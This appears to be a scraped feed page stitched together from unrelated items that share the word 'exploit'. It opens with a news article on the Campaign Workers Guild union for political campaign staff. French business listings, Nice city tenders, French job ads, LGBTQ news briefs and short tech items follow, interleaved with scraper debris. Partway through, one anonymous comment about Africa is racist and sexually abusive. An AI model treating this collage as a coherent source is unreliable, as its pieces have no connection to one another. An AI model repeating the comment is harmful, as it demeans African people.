The midterm elections are a month away, which means the next few weeks are an incredibly demanding time for the people who work on campaigns. But there's been a growing movement over the past few months to protect field workers and canvassers from potentially exploitative workplace conditions. A new, independent union called the Campaign Workers Guild formed in February and has bargained contracts for 24 campaigns. It now represents over 500 members nationwide.

That's right. The organizers are getting organized.

In the past, campaign workers have unionized by joining existing unions for different kinds of workers. But in February of this year, a group of organizers decided there was a need for a separate and specific union for people who work on political campaigns.

Kim McMurray, a former organizer for Vermont Senator Bernie Sanders, was involved in the creation of the guild. She's now on the executive council. She says field organizers often work long, erratic hours and can find themselves suddenly out of a job when their candidate drops out or loses a race.

"The overarching message from leadership on campaigns is that you do this work because you love it. And that’s absolutely true," said McMurray. "That doesn’t mean we should be sacrificing our own well-being to do it."

The union has several top priorities when they come to the bargaining table with a candidate: fair pay, fair scheduling, safe and secure housing, health-care stipends and contract language about sexual harassment and discrimination. But ultimately it's up to the workers to decide what to bargain for.

"We've had people ask for making sure the temperature in their office is a normal amount, to severance at the end of a campaign, to a wide range of things in the middle," said McMurray. "We made it pretty typical that you'll get paid for at least two weeks after the campaign, which was really not something that's been standard before."

McMurray says the Campaign Workers Guild is open to representing Democratic and Republican campaign workers, though so far all of their members work for Democratic candidates.

"For decades, the majority of workers on campaigns, especially Democratic ones, have been denied the very same protections that their candidates publicly champion," said McMurray. "There became a real disconnect." 

All this means, between severance packages, higher hourly wages, and healthcare stipends, candidates who agree to the demands of their unionized staff end up spending more to run their campaigns. Julia Salazar, a Democratic candidate for New York State Senate, is one of two active candidates in New York whose workers have unionized under the Campaign Workers Guild. She says severance packages and higher hourly wages were the biggest points of negotiation.

"That was probably the most important thing and that also naturally took more out of our budget," Salazar told WNYC. "Our negotiations were brief. I really wanted to provide the strongest contract and the most generous contract that I was able to."

Salazar, herself a member of the National Writers Union, says agreeing to better working conditions is part of "walking the walk" as a progressive candidate.

Campaign workers for Max Rose, a Democrat running for New York's 11th congressional district, have also unionized under the Campaign Workers Guild. Now non-active New York campaigns whose workers unionized through CWG include Cynthia Nixon for governor, Ross Barkan for state senate and Brian Flynn for congress.

Loading...

          'CA Republican steals transgender veteran's photo for ugly attack ad' & other Tue midday news briefs      Cache   Translate Page      
Nasty and disrespectful way to treat those who fight for our freedoms.

California Republican steals transgender veteran’s photo for campaign attack - First folks on the opposite side of our equality want to take our tax dollars while discriminating against us. Now they want to exploit our faces and images. Tacky as hell.  

Gay Comedian Sampson McCormick Will Make History on Coming Out Day - Sampson is a wonderful comedian and definitely deserves this honor. McCormick will headline a Coming Out Day event at the National Museum of African-American History in Washington D.C., on Thursday, October 11. The event will celebrate the contributions of black queer art of the Harlem Renaissance; McCormick will be the first LGBTQ comic to ever perform at a Smithsonian museum.  

Black History Month: 5 black LGBT heroes who fought for equal rights - Goes without saying. A few of these folks even I wasn't aware of. 

Victory! Hawai`i Supreme Court Upholds Parenting Rights and Responsibilities of Married Same-Sex Couples - Good news! Under the radar but still good news. 

GLAAD is accepting nominations for its 30th annual GLAAD Media Awards - calling ALL LGBTQ blogs! You can nominate yourself and GLAAD is waiving the admission fee for LGBTQ blogs. As a past recipient of a GLAAD Media Award (that just brought a delightful chill down my spine), I can tell you that even being nominated is a huge honor. And winning is like  . . .  wheeeew!!! It's been over a year and there is a part of me which still isn't down from the high.

                Cache   Translate Page      
Africa where nature has remained unchanged for your sake.........with over 100,000 elephants..... how naturally remained is that what you offer in african terms....? its called prostitution and/or exploitation sucking white dicks for money I call that post-post-colonialism. sorry for being rude, but i think it stinks what u do. jay-b
          Exploitation saisonnier - Sephora - Saint-Bruno-de-Montarville, QC      Cache   Translate Page      
QC-St Bruno (0520). Nom du lieu de travail:QC-St Bruno (0520). Identifiant de la demande:....
From Sephora - Wed, 05 Sep 2018 20:28:54 GMT - View all Saint-Bruno-de-Montarville, QC jobs
          RESTAURATION RAPIDE      Cache   Translate Page      
DIAGNOSTIC REALISE - Point de restauration rapide situé à Toulouse dans zone d'activité et de commerces. Carte variée, sandwichs, salades, burgers et plat du jour. Etablissement ouvert le midi du lundi au vendredi. Local de 20m2 doté de l'ensemble des équipements nécessaires à la conservation, la préparation et la cuisson des produits. Terrasse extérieure pouvant offrir jusqu'à 20 places assises. Exploité par chef d'entreprise aidé par un salarié pour le service du midi. CA : 54 512 €. Loyer : 250 €/mois. Prix du fonds : 30 000 €. CONTACT : Chambre de métiers et de l'artisanat de la Haute-Garonne - Mme GRANIER
          CHAMBRES D HOTES ET GITE      Cache   Translate Page      
A vendre, maison du XVIIème siècle, 13 pièces/650m2 sur un terrain de 5500m2, au sud du Lubéron. Dans un cadre champêtre, à l’écart du bruit de la ville, cette propriété vous offre une vue imprenable sur la Vallée de la Durance et sur les pénitents des Mées. Sont exploités 5 chambres d’hôtes, 1 dortoir de 10 places, 1 gîte pour 2 personnes dans un ancien pigeonnier, 5 salles d’eau et 2 salles de bain + 8WC. Un espace privatif de 120m2 (avec 2 chambres). Une salle de restaurant de 110m2, une cuisine de 60m2, une buanderie et un espace de stockage vélos. Le parc est aménagé, vous y trouverez également un espace détente avec jacuzzi. Idéal pour organiser des évènements tels que mariage, baptême, séminaire d’entreprises… mais également pour recevoir les visiteurs de la Vallée, les randonneurs, les VTTistes puisque la propriété se situe au sein d’un parc VTT. Tout cela réalisé avec beaucoup de charme, tout en gardant le cachet de l’ancien (bel escalier d’origine en pierres, grande salle voûtée…). Idéal pour un couple. Indispensable d’avoir un apport personnel. Prix de l’ensemble : 900 000€. Accompagnement possible du cédant.
          HOTEL RESTAURANT 3 ETOILES      Cache   Translate Page      
Hôtel restaurant 3 étoiles, logis de france, situé sur une des plus belle étape sur le chemin de st Jacques de Compostelle ( 20 000 passages par an) entre le Puy et Conques sur le plateau de l'Aubrac. Cette affaire est tenue depuis 2009 par un couple de vrais professionnels qui a su régulièrement investir, travailler la qualité et le service pour développer une activité pérenne..., cette entreprise présente grâce à ses caractéristiques spécifiques une opportunité rare : - Une surface de 800 m2 bâtie avec 17 chambres à la décoration raffinée et soignée - Une capacité intérieure de 70 couverts en restauration - Une très forte notoriété et visibilité sur internet : 89% de taux de satisfaction sur 1 107 avis et sur 12 portails - Un CA de 656 000 € en progression et un EBE de 132 000 € ( rémunération exploitant incluse). De plus son emplacement en ZRR permet de bénéficier de plusieurs dispositifs spécifiques (exonération d'impôt pendant 5 ans puis 3 ans en dégressif) et subvention d'investissement à l'achat par la communauté de communes Prix des murs 440 000 €, prix du fond 400 000 €
          COIFFURE EN SALON      Cache   Translate Page      
Nevers Grand Mouesse, Cause santé, vends salon de coiffure mixte exploité depuis 12 ans situé dans une zone passante avec parking gratuit et à côté de commerces de proximité. Salon entièrement rénové avec 4 postes de coiffage, 2 bacs de lavage, 1 climazon et une climatisation réversible. Matériel complet et en très bon état. Un exploitant. Un dernier chiffre d’affaires hors taxes de 45 297€, EBE : 30%. Vends fonds + local (42m2 de production au RDC, 20m2 de bureau/stockage au 1er étage et une cour extérieure avec possibilité d’aménagement). Prix fonds seul : 24 000 euros. Prix fonds + murs : 61 000 euros.
          FLEURISTE ...      Cache   Translate Page      
VENTE FLEURS PLANTES CADEAUX COMPOSITIONS DEUILS MARIAGES. Cause retraite cède Fonds de commerce CA 170.000€. Entrée de ville Douai. Belle affaire de notoriété exploitée 35ans en fleuristerie, cadeaux. Bail exclusif Fleuriste. Magasin d'angle 99 m2. Façade 2 x 4m de vitrine. Atelier réserve 94 m2 avec porte de garage dans. Chambre froide env. 20 m2. Cave. Loyer 808€ /mois. Prix du FdC : 120.000€.
          RESTAURATION RAPIDE ITALIENNE      Cache   Translate Page      
Restauration rapide italienne, orientée vente à emporter, situé dans un centre commercial de Rouen. Une année d'exploitation seulement. Equipements neufs, décoration par architecte d'intérieur. Salle + terrasse extérieure. Equipe de 4 salariés + 1 gérant non rémunéré. Ouverture 11h30 à 22h, 7j/7, Site Web. Cession en parts sociales incluant le passif du premier exercice (env. 75 K€)et les engagements financiers à terme liés à la création (120 K€). Possibilité ouvrir le matin. Equilibre exploitation prévu en juin 2019 (Armada Rouen). Prix de cession : 60 K€.
          CAFE BRASSERIE HOTEL      Cache   Translate Page      
Café Brasserie Hôtel, situé dans une ville importante de Vaucluse, sur un bon emplacement. Salle 60 couverts, terrasse 30 couverts. 11 chambres dont 10 équipées de toilettes et salle d'eau. Non classé. Grande cuisine. Immeuble en R + 3 d'environ 350 m2. Exploité en entreprise individuelle sans salarié. Bail commercial à la cession avec loyer HT annuel de 18 000 € et possibilité de vente des murs. Prix du fonds : 140 000 € - Murs et fonds : 450 000 €. Cession cause retraite.
          AAPC MANEGE PLACE ARMEE DU RHIN      Cache   Translate Page      
OFFRE DES COLLECTIVITES - La ville de Nice lance une procédure de mise en concurrence pour autoriser l’occupation du domaine public en vue de l’exploitation d’un manège sur la place Armée du Rhin, à Nice. Le diamètre du manège sera de 7 mètres minimum. A l’issue de cette procédure, une convention d’occupation du domaine public communal sera conclue. 1) Caractéristiques essentielles de la convention : Redevance annuelle d’occupation du domaine public : redevance composée d'une part fixe annuelle (plancher fixé à 3 000 €) et d'une part variable correspondant à 0,5% du CA H.T. annuel de l'exploitation (plancher de recouvrement de 500 €). Durée : la convention entrera en vigueur à sa date de notification, sous réserve de la réalisation des conditions suspensives. Elle est conclue pour une durée de 3 ans à compter du premier jour d’exploitation du manège, durée prorogeable trois fois pour une durée d’un an chaque fois, par tacite reconduction (durée maximum : 6 ans). 2) Critères d’attribution - Montant de la redevance annuelle proposé par le candidat à partir du plancher fixé à 3 000 € (pour valeur dans le jugement des offres : 50%) - Esthétique du manège et intégration dans le site (pour valeur dans le jugement des offres : 35%) - Développement durable (pour valeur dans le jugement des offres : 15%). 3) Procédure Les modalités de constitution et de remise des dossiers de candidature sont précisées à l’article 7 du règlement de consultation. L’entier dossier de consultation est à retirer à la : DIRCEP Service ODP concurrentielles 37 avenue Maréchal Foch – 3ème étage Ou sur https://webodp.nicecotedazur.org/WebODP/AppelConcurrence.aspx - Date limite de réception des dossiers de candidature : le 5 novembre 2018 à 16h00. Pour tout renseignement : 04.97.13.27.49 ou 04.97.13.23.89.
          AAPC MANEGE PARC CASTEL DEUX ROIS       Cache   Translate Page      
OFFRE DES COLLECTIVITES - La ville de Nice lance une procédure de mise en concurrence pour autoriser l’occupation du domaine public en vue de l’exploitation d’un manège au parc du Castel des deux rois, à Nice. Le diamètre du manège sera de 7 mètres. A l’issue de cette procédure, une convention d’occupation du domaine public communal sera conclue. 1) Caractéristiques essentielles de la convention : Redevance annuelle d’occupation du domaine public : redevance composée d'une part fixe annuelle (plancher fixé à 12 000 €) et d'une part variable correspondant à 0,5% du CA H.T. annuel de l'exploitation (plancher de recouvrement de 500 €). Durée : La convention entrera en vigueur le 29 mars 2019. Elle est conclue pour une durée de 3 ans, durée prorogeable trois fois, pour une durée d’un an chaque fois, par tacite reconduction (durée maximum : 6 ans). 2) Critères d’attribution - Montant de la redevance annuelle proposé par le candidat à partir du plancher fixé à 12 000 € (pour valeur dans le jugement des offres : 70%) - Esthétique et développement durable (pour valeur dans le jugement des offres : 30%) 3) Procédure Les modalités de constitution et de remise des dossiers de candidature sont précisées à l’article 7 du règlement de consultation. L’entier dossier de consultation est à retirer à la : DIRCEP Service ODP concurrentielles 37 avenue Maréchal Foch – 3ème étage Ou sur https://webodp.nicecotedazur.org/WebODP/AppelConcurrence.aspx. Date limite de réception des dossiers de candidature : le 5 novembre 2018 à 16h. Pour tout renseignement : 04.97.13.27.49 ou 04.97.13.23.89.
          AAPC SNACK PARC CAROL DE ROUMANIE      Cache   Translate Page      
OFFRE DES COLLECTIVITES - La ville de Nice lance une procédure de mise en concurrence pour autoriser l’occupation du domaine public en vue de l’exploitation d’un snack avec terrasse au parc Carol de Roumanie, 23 avenue de Fabron, à Nice. A l’issue de cette procédure, une convention d’occupation du domaine public communal sera conclue. 1) Caractéristiques essentielles de la convention : Redevance annuelle d’occupation du domaine public : redevance composée d'une part fixe annuelle (plancher fixé à 5 500 €) et d'une part variable correspondant à 1% du CA H.T. annuel de l'exploitation (plancher de recouvrement de 500 €). Durée : la convention entrera en vigueur au plus tôt le 28 décembre 2018. Elle est conclue pour une durée d’un an, durée prorogeable deux fois pour une durée d’un an chaque fois, par tacite reconduction (durée maximum : 3 ans). 2) Critères d’attribution : - Montant de la redevance annuelle proposé par le candidat à partir du plancher fixé à 5 500 € (pour valeur dans le jugement des offres : 70 %) - Diversité et développement durable (pour valeur dans le jugement des offres : 30 %) o Diversité des produits proposés o Valorisation des produits biologiques o Utilisation de produits éco labellisés pour le nettoyage de l’exploitation - 3) Procédure : Les modalités de constitution et de remise des dossiers de candidature sont précisées à l’article 7 du règlement de consultation. L’entier dossier de consultation est à retirer à la : DIRCEP - Service ODP concurrentielles - 37 avenue Maréchal Foch – 3ème étage -Ou sur http://usagers.ville-nice.fr/WebODP/AppelConcurrence.aspx - Date limite de réception des dossiers de candidature : le 5 novembre 2018 à 16h. Pour tout renseignement : 04.97.13.27.49 ou 04.97.13.23.89.
          AAPC MAGASIN PLANTES ET FLEURS       Cache   Translate Page      
OFFRE DES COLLECTIVITES - La ville de Nice lance une procédure de mise en concurrence pour autoriser l’occupation du domaine public en vue de l’exploitation d’un magasin de plantes et fleurs avec étalage attenant, 5 place Caucade, à Nice. A l’issue de cette procédure, une convention d’occupation du domaine public communal sera conclue. 1) Caractéristiques essentielles de la convention : Redevance annuelle d’occupation du domaine public : redevance composée d'une part fixe annuelle (plancher fixé à 11 500 €) et d'une part variable correspondant à 1% du CA H.T. annuel de l'exploitation (plancher de recouvrement de 1 000 €). Durée : la convention entrera en vigueur le 13 avril 2019. Elle est conclue pour une durée d’un an, durée prorogeable trois fois pour une durée d’un an chaque fois, par tacite reconduction (durée maximum : 4 ans). 2) Critères d’attribution - Montant de la redevance annuelle proposé par le candidat à partir du plancher fixé à 11 500 € (pour valeur dans le jugement des offres : 70 %) - Développement durable (pour valeur dans le jugement des offres : 30 %) 3) Procédure : Les modalités de constitution et de remise des dossiers de candidature sont précisées à l’article 7 du règlement de consultation. L’entier dossier de consultation est à retirer à la : DIRCEP Service ODP concurrentielles 37 avenue Maréchal Foch – 3ème étage Ou sur http://usagers.ville-nice.fr/WebODP/AppelConcurrence.aspx - Date limite de réception des dossiers de candidature : le 5 novembre 2018 à 16h. Pour tout renseignement : 04.97.13.27.49 ou 04.97.13.23.89.
          Cyber Tests Showed 'Nearly All' New Pentagon Weapons Vulnerable To Attack, GAO Says - NPR      Cache   Translate Page      

NPR


          "At its peak, Apple was seeing 60% of warranty repairs in China and Hong Kong as being fraudulent, literally costing Apple billions of dollars per year"      Cache   Translate Page      
9to5:
Initially, Apple stopped allowing walk-in repairs and required reservation systems that supposedly ensured proof of ownership was provided. The system was beaten by hackers who exploited vulnerabilities in the web system who sniped all the time slots.

Apple then required candidate iPhone devices to run software diagnostics which would identify any fake parts inside, without requiring store staff to disassemble components and perform inspections. The thieves circumvented this by simply making the iPhones not turn on.

Some criminals were even more sophisticated.

          Responsable Boucherie H/F      Cache   Translate Page      
En tant que Responsable Boucherie, vous avez pour missions : Commercialisation de vos produits grâce à une mise en avant originale et en adéquation avec les attentes du Directeur :      * Vous développez et mettez en place des promotions régulières et percutantes. Gestion des ratios économiques :      * Vous pilotez votre compte d'exploitation, ainsi que vos indicateurs de performances et vous mettez en place les actions nécessaires pour atteindre les objectifs fixés. Votre sens du résultat et votre rigueur vous permettent d'atteindre vos objectifs,     * Vous maîtrisez les techniques de conservation,     * Vous veillez à l'entretien des équipements et des locaux,     * Vous maîtrisez les DLC,     * Vous veillez à l'hygiène, la traçabilité, la sécurité et l'environnement,     * Vous encadrez et accompagnez votre équipe, afin qu'elle optimise la satisfaction de la clientèle et qu'elle rende votre rayon attractif,     * Véritable Commerçant, la satisfaction client est au coeur de votre métier ; votre parfaite connaissance des produits et vos conseils avisés sont reconnus par vos clients.
          Chargé d'Affaires Maçonnerie H/F      Cache   Translate Page      
Directement rattaché au Responsable d'Exploitation, vous assurez l'ensemble de la réalisation des affaires relatives à votre domaine : Réparation d'ouvrage d'art, réparation bétons dégradés, renforcement structure béton armé, nettoyage, ravalement... Vous avez notamment pour missions :      * Pérenniser commercialement le portefeuille clients de la société en assurant la gestion globale des affaires relatives à votre domaine de la conception à la réalisation des devis,     * Réaliser et piloter les études techniques, financières et budgétaires des dossiers d'affaires en phase réponse ou en phase exploitation,     * Répondre aux dossiers d'offres,     * Suivre la réalisation des chantiers jusqu'à la livraison. Vous êtes pour cela en relation permanente avec les maîtres d'ouvrage et les maîtres d'oeuvre et vous organisez le transfert des dossiers aux équipes de travaux ; vous planifiez votre travail en toute autonomie en relation avec les différents acteurs de l'entreprise (Direction Générale, personnel d'encadrement, personnel de chantier, clients et fournisseurs).
          Technicien Courant Faible H/F      Cache   Translate Page      
Rattaché au Chef d'Entreprise ainsi qu'au Responsable d'Exploitation, en tant que Technicien Courant Faible, vous êtes en charge des missions suivantes :      * Mener à bien les chantiers et les SAV aussi bien d'un point de vue administratif que technique,     * Préparer et gérer administrativement les chantiers en lien avec le Responsable d'Exploitation (approvisionnement, rassemblement des documents techniques, devis, facturation...),     * Coordonner vos actions avec les autres corps d'état et participer aux réunions de chantier,     * Maîtriser les techniques d'installation (serrurerie, coffre, alarme, vidéo...) afin d'établir un diagnostic et d'intervenir,     * Être l'interlocuteur privilégié auprès de vos clients afin d'apporter une solution adaptée,     * Clôturer les chantiers et les interventions (en vue de l'établissement d'un devis ou d'une replanification d'intervention),     * Remplir les fiches techniques ABSAD (vidéo, alarme).
          Gestionnaire Locatif Baux Commerciaux H/F      Cache   Translate Page      
En tant que Gestionnaire Locatif Baux Commerciaux, vos principales missions sont :      * Traitement des mails et courriers réceptionnés,     * Renouvellement des baux,     * Gestion des congés,     * Suivi des sinistres,     * Veille à la mise en application des clauses des baux,     * Aide au traitement des contentieux,     * Relation avec les Services internes (Juridique, Technique, Exploitation),     * Relation avec les locataires, bailleurs et intervenants externes divers. Cette liste est non-exhaustive.
          Responsable Maintenance H/F      Cache   Translate Page      
Vous êtes chargé d'animer tout le Service Maintenance (préventive, curative, prédictive et amélioration continue) et de définir les objectifs à court terme (fiabilité, coûts, formation) et à long terme (investissements, budgets maintenance...). A ce titre, vos missions sont les suivantes :      * Vous coordonnez l'ensemble des actions de maintenance des installations d'exploitation en collaboration avec vos équipes,      * Vous définissez et pilotez les budgets de maintenance en collaboration avec la Direction du site et la Direction Industrielle,     * Vous déployez les budgets par périmètre et accompagnez les membres de votre équipe pour leur mise en oeuvre,      * Vous maintenez la performance nominale des installations dans le respect des coûts et optimisez leur disponibilité,      * Vous veillez, au même titre que les Managers de Production, au maintien des dispositifs de protection des personnes et des machines, à l'animation de la sécurité et de l'environnement au sein de votre périmètre,      * Vous veillez à l'amélioration de la sécurité et des conditions de travail sur les nouvelles installations et déployez les plans de formation nécessaires.
          Chef de Projet Grands Travaux H/F      Cache   Translate Page      
Dans le cadre de votre poste de Chef de Projet Grands Travaux, vous intervenez sous la direction du Directeur d'Exploitation. Vos principales missions sont :      * Vous êtes le garant de la bonne conduite de la relation client,     * Vous intervenez afin de transformer le programme en projet,     * Vous planifiez le projet afin d'assurer la livraison dans les délais impartis,     * Vous coordonnez l'ensemble des études techniques en interne et en externe,     * Vous conduisez le montage des dossiers d'autorisations administratives nécessaires aux chantiers,     * Vous collaborez avec les Services Travaux jusqu'à la livraison. Cette liste est indicative afin de vous permettre de vous projeter sur les principaux aspects du poste. Elle n'est pas limitative.
          Responsable Maintenance H/F      Cache   Translate Page      
Vous êtes chargé d'animer tout le Service Maintenance (préventive, curative, prédictive et amélioration continue) et de définir les objectifs à court terme (fiabilité, coûts, formation) et à long terme (investissements, budgets maintenance...). A ce titre, vos missions sont les suivantes :      * Vous coordonnez l'ensemble des actions de maintenance des installations d'exploitation en collaboration avec vos équipes,     * Vous déployez les budgets par périmètre et accompagnez les membres de votre équipe pour leur mise en oeuvre,     * Vous maintenez la performance nominale des installations dans le respect des coûts et optimisez leur disponibilité,     * Vous veillez, au même titre que les Managers de Production, au maintien des dispositifs de protection des personnes et des machines, à l'animation de la sécurité et de l'environnement au sein de votre périmètre,     * Vous veillez à l'amélioration de la sécurité et des conditions de travail sur les nouvelles installations et déployez les plans de formation nécessaires,     * Vous managez vos équipes (organisation de l'activité, entretiens individuels, climat social, formations, etc.) et accompagnez leur évolution de compétences.
          Chargé d'Affaires Matériel Médical F/H      Cache   Translate Page      
Notre client est une société leader dans la distribution de médicaments vétérinaires, petfood, matériels et services aux vétérinaires, présente en France et en Europe. Dans le cadre d'un remplacement, nous recherchons un : Chargé d'Affaires Matériel Médical F/H (Secteur **********). Rattaché au Responsable Régional des Ventes, vous développez le chiffre d'affaires de votre secteur en assurant la promotion technique et la vente d'un catalogue de matériels de haute qualité, fidélisez une clientèle de cliniques et cabinets vétérinaires déjà acquis et prospectez de nouveaux clients. Vos principales missions sont : - le ciblage client et la construction de plans d'actions et de tournées, - la qualification des besoins du client, - l'implémentation de l'offre commerciale, la présentation des gammes, la conduite des négociations et le closing des ventes, - la participation à la mise en place du matériel, la mise en oeuvre de votre savoir-faire dans l'accompagnement du client et la prise en charge d'une maintenance de premier niveau si nécessaire, - plus largement, la promotion et la vente de l'ensemble des produits et services de la société, - la collaboration avec les Chargés de Clientèle de votre secteur pour exploiter toutes opportunités relatives à la distribution du médicament du petfood ou de la vente de services, - la veille concurrentielle active.
          Key Account Manager F/H      Cache   Translate Page      
Notre client est aujourd'hui leader mondial du marketing relationnel, basé sur le comportement réel d'achat des consommateurs. Grâce à l'exploitation de bases de données comportementales (notamment à travers les cartes de fidélité), ce Groupe met en place des offres promotionnelles ciblées avec une approche CRM Digital qui rencontre un grand succès sur son marché. Nous recherchons un : KEY ACCOUNT MANAGER F/H Poste basé à Paris. Reportant au Directeur Commercial Grande Consommation France, vous aurez en charge un portefeuille de clients existants et de prospects. Missions principales -Diagnostiquer et élaborer un plan d'action commercial sur l'ensemble de votre portefeuille afin de développer l'activité de manière pérenne. -Mettre en oeuvre la stratégie : prospection, élaboration de plans d'actions marketing, identification et prise de rendez-vous avec l'ensemble des interlocuteurs-clés. -Benchmarker le marché, établir une veille concurrentielle et rechercher des relais de croissance, -Coordonner l'action des consultants qui travaillent sur le portefeuille et les projets, être garant de la qualité de prestation. -Apporter de la Valeur Ajoutée dans le cadre de la vente d'une prestation Marketing Haut de Gamme. -Gérer et développez le relationnel client.
          Responsable d'Affaires MOEX H/F      Cache   Translate Page      
Dans le cadre de votre poste de Responsable d'Affaires MOEX, vous intervenez sous la direction du Directeur d'Exploitation. Vos principales missions sont :      * Vous encadrez des Chefs de Projets expérimentés,     * Vous êtes le garant de la bonne conduite de la relation client sur les chantiers les plus techniques,     * Vous intervenez afin de transformer le programme en projet,     * Vous suivez le projet afin d'assurer la livraison dans les délais impartis,     * Vous centralisez l'ensemble des études techniques en interne et en externe,     * Vous déléguez le montage des dossiers d'autorisations administratives nécessaires aux chantiers,     * Vous collaborez avec les Services Travaux jusqu'à la livraison. Cette liste est indicative afin de vous permettre de vous projeter sur les principaux aspects du poste. Elle n'est pas limitative.
          Ingénieur Développement Produit H/F      Cache   Translate Page      
En tant qu'Ingénieur Développement Produit, au sein du Département Ingénierie, sous la responsabilité du Responsable Ingénierie Système, vous prenez la responsabilité technique du développement et de la vie série des équipements de climatisation, dans les projets qui vous sont confiés :      * Réaliser les offres techniques lors des phases d'appels d'offres en lien avec les Services Techniques de l'entreprise,     * Lors de la phase de développement, être le garant des performances techniques de vos équipements et gérer la conception dans le respect des critères qualités des projets,     * Suivre le processus de développement de l'entreprise,     * Réaliser et/ou superviser des livrables techniques (notes de calcul, documentation technique, plans, notes de calcul),     * Réaliser et suivre des plans de validation sur les prototypes,     * Suivre des essais de type client,     * Suivre des produits en phase d'exploitation chez nos clients. Pour la réalisation de ces missions, au-delà de votre spécialité technique, vous vous appuyez sur les experts et spécialistes du Département Ingénierie.
          Responsable de Centre H/F      Cache   Translate Page      
Comme Responsable d'un Centre de compétences, vous jouez un rôle clé dans le développement de notre filiale Canon France Business Services, votre principale mission sera d'assurer le management opérationnel du centre tout en développant la marge des comptes clients dont vous aurez la responsabilité. Ce que nous offrons Chez Canon, vous ne serez jamais seul. Entouré de collaborateurs ambitieux comme vous, vous aurez le support et l'encadrement dont vous aurez besoin. Nous prendrons part à votre épanouissement professionnel en vous guidant dans l'accomplissement de vos missions. Vous rencontrerez des managers qui vous donneront la liberté d'explorer de nouvelles possibilités au sein d'une équipe où, savoirs et connaissances sont partagés. Principales activités à réaliser : - Organiser, animer et coordonner un centre de production mutualisé - Superviser, organiser, planifier et optimiser le travail des équipes de production et d'encadrement (100 collaborateurs) afin de réaliser une production conforme en terme de délai, de qualité et de priorité de traitement, - Piloter la relation clients du centre et être garant de la satisfaction client - Développer les prestations additionnelles chez nos clients - Veiller à l'amélioration et l'industrialisation constante des techniques de production, à la diminution des coûts de production et à l'augmentation de la productivité - Négocier, mettre en place, piloter l'ensemble des sous-traitants, fournisseurs, partenaires. - Manager le compte d'exploitation du centre en conformité avec la politique commerciale de l'entreprise et être garant du respect du P&L en termes de Chiffre d'Affaires et de Marge. - Etre garant de la mise en oeuvre du système management qualité du centre
          Locataire - Gérant YVES ROCHER H/F      Cache   Translate Page      
Envie d'entreprendre et de mettre à profit les compétences acquises au cours de votre vie professionnelle et ce, avec peu d'investissement ? Nous avons une solution sur mesure : la location-gérance Yves Rocher ! Véritable chef d'entreprise, vous avez pour rôle : - Ecouter, conseiller et satisfaire au mieux la clientèle par une démarche professionnelle et adaptée. - Offrir une véritable qualité de service dans un cadre agréable et accueillant. - Promouvoir les valeurs et les atouts de la Marque. - Recruter, former, animer et accompagner votre équipe. - Entretenir une ambiance de travail saine. - Définir les objectifs commerciaux de votre magasin. - Assurer la pérennité de votre exploitation par une gestion saine et maîtrisée et en assumer et déterminer les frais inhérents (masse salariale, frais généraux, fournisseurs, redevances, etc...). - Gérer et contrôler votre stock en fonction de l'activité commerciale.
          INGÉNIEUR COMMERCIAL & PARTENARIATS MAINTENANCE      Cache   Translate Page      
Missions Rattaché au Responsable Maintenance Groupe, et en étroite collaboration avec le département commercial de l'activité essais et le pôle affaires du Groupe, vos principales missions seront les suivantes : Stratégie & Marchés : - Définir une stratégie commerciale et mettre en oeuvre un plan de prospection ciblé sur les nouveaux marchés, - Définir et développer un plan d'action afin de gérer et accroitre les partenariats stratégiques avec les meilleurs constructeurs mondiaux de moyens d'essai. - Participer à la définition des nouveaux services à proposer aux clients du groupe, - Mettre en place et développer l'activité d'achat/vente de matériel d'essais, - Renforcer l'activité de vente des pièces détachées/rechanges. - Négocier et mettre en oeuvre les contrats annuels de maintenance avec les clients, Missions & Objectifs : - Prospecter activement sur le terrain, par les moyens mis à disposition (fichiers prospects / Clients Groupes, CRM, Clubs affaires, Salons professionnels, animations d'actions de communication ciblées...), - Analyser, modéliser, comprendre les besoins et les attentes mais aussi la chaine de décision des prospects, - Développer le chiffre d'affaires Maintenance et Assistance du Groupe sur le marché français et européen - Identifier les cibles commerciales lors de contacts directs et à l'aide des outils de prospection, et les opportunités de reprise/rachat de machines d'essais chez vos clients - Valoriser et répondre aux opportunités et/ou consultations commerciales émanant des synergies du Groupe en lien avec les services commerciaux transverses, - Rédiger, Chiffrer les offres commerciales et techniques dans une approche différenciante - en collaborant avec les experts techniques du service maintenance et avec les différents départements supports du Groupe, - Inscrire et Fidéliser vos Clients dans la durée, Missions transverses : - Réaliser une veille concurrentielle et stratégique sur votre périmètre - Définir et piloter avec le Responsable Maintenance Groupe les indicateurs de performance de vos actions, - Être l'interface Client avec le service Maintenance et Assistance en assurant les présentations et la bonne passation des contrats aux différents interlocuteurs de l'exploitation. - Etre le garant de la rentabilité des chiffrages en accord avec la direction et les ratios définis en amont,
          Directeur(rice) de magasin - Bayonne H/F      Cache   Translate Page      
Si vous vous reconnaissez dans ce portrait ... Vous êtes prêt à prendre en charge la responsabilité de notre magasin de Bayonne ? Vous animez votre équipe de direction composée de chefs de secteur et les coachez avec ambition, reconnaissance et exigence. Passionné par l'univers de la maison (que vous soyez fin gourmet ou gourmand, créatif ou astucieux, tout est possible...), vous définissez et mettez en oeuvre votre stratégie commerciale et participez à l'évolution de notre stratégie produit (vous êtes prêt à prendre des risques et ne craignez pas l'échec !). Vous inculquez une forte culture de résultats et pilotez votre compte d'exploitation en étroite collaboration avec votre comité de direction (sens et pédagogie sont vos maitres mots !). Commerçant dans l'âme, vous incarnez l'écoute client et savez impliquer votre équipe pour lui donner tout son sens en magasin. Audacieux, vous contribuez activement à l'innovation dans le commerce de la maison créative dans un esprit " comme à la maison " et fédérez votre équipe dans ce projet d'entreprise.
          FMOS-FAPH/USTTB : Ginna Dogon honore la mémoire de Pr. Ogobara Doumbo      Cache   Translate Page      
Dans la matinée du vendredi 28 septembre 2018, un vibrant hommage a été rendu à feu professeur Ogobara Doumbo pour ses nombreux exploits en faveur du Mali, de l’Afrique et du monde entier. C’était à l’initiative de l’association Ginna Dogon en partenariat avec la Faculté de médecine et d’odontostomatologie (FMOS) et la Faculté de pharmacie …
          «L’Aquarius en Suisse? Les coûts seraient trop élevés»      Cache   Translate Page      
L’armateur allemand du navire humanitaire exploité par SOS Méditerranée nourrit peu d’espoir de voir le navire battre un jour pavillon suisse. D’après lui, les difficultés financières et administratives imposées par le droit helvétique sont trop lourdes
          Affirmative Action as Counterweight to Privilege and Elitism      Cache   Translate Page      

Affirmative Action BattleBetty Hung: As an Asian American woman, I refuse to be used by conservatives who are trying to exploit Asian Americans as a wedge in their efforts to abolish affirmative action in university admissions.

The post Affirmative Action as Counterweight to Privilege and Elitism appeared first on LA Progressive.


